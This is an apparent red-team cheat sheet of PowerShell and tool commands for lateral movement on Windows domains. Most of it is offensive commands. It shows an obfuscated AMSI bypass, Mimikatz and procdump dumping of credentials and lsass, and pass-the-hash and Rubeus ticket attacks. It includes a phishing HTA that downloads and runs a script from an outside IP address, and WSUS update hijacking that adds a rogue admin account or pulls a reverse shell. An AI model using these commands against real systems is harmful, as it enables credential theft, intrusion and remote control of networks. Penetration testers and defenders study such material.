Lateral Movement

PSRemoting

PSRemoting Session

New-PSSession -ComputerName Target1
Enter-PSSession -ComputerName Target1

# Set TrustedHosts so PSRemoting can target an IP rather than a hostname; "*" trusts every host, so the client will send credentials to any endpoint without verifying it
winrm set winrm/config/client '@{TrustedHosts="*"}'

# Connect with local admin creds
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}

# If you are over C2 and can't get an interactive prompt (the password is passed in plaintext on the command line and is captured by PowerShell script block logging / transcription where enabled)
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

PSRemoting Invoke-Command

# Execute Commands or script blocks:
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)

# Execute scripts from files:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

# Pass arguments:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList <args>

# When the script file itself calls the function, run the file with -FilePath:
Invoke-Command -Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute stateful commands (variables persist across calls within the same session):
$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

Stateful Mimikatz

$sess = new-pssession -computername server1
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )}
Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -session $sess

Invoke-Mimikatz

# Dump Creds on local machine
Invoke-Mimikatz -DumpCreds

# Dump creds on multiple machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2") 

# "Overpass-the-hash": generate a logon session (tokens) from an NTLM hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'

Double Hop Problem

PowerShell

$cred = Get-Credential DOMAIN\USER

# Execute commands
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}

# Copy files
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}

# Dump
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}

# Copy dump back
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}

Rubeus can also be used over the double hop to extract a ticket and then interact with a third system:
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}

PsExec / Rubeus

# psexec to first host
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd

# Use Rubeus on the first host to overpass-the-hash and then access the second host.
# NOTE: using the /domain flag makes it unreliable.
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Phish

# Generate HTA
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

# Send Email
Send-MailMessage -From 'User01 <user01@fabrikam.com>' -To 'User02 <user02@fabrikam.com>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF

# Use Nishang to generate PowerShell phishing payloads

Pass-The-Hash

runas /noprofile /netonly /user:<domain\username> powershell.exe

Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'

PsExec

WSUS

Enumeration

# If you compromise a WSUS server you can reach every client that receives updates from it

# See which computers are connecting for updates (port 8530 = HTTP, port 8531 = HTTPS)
netstat -ano 

Abuse

https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1

# Place psexec.exe in the same directory as WSUSpendu.ps1

# Send out a malicious update that adds a local admin account on the target machine
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net

# Reach isolated networks with a reverse shell
# where Reverse.ps1 is an AMSI bypass plus a reverse shell connecting back over 8531
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>

# Listen on the host and wait for the connection
powercat -l -v -p 8531
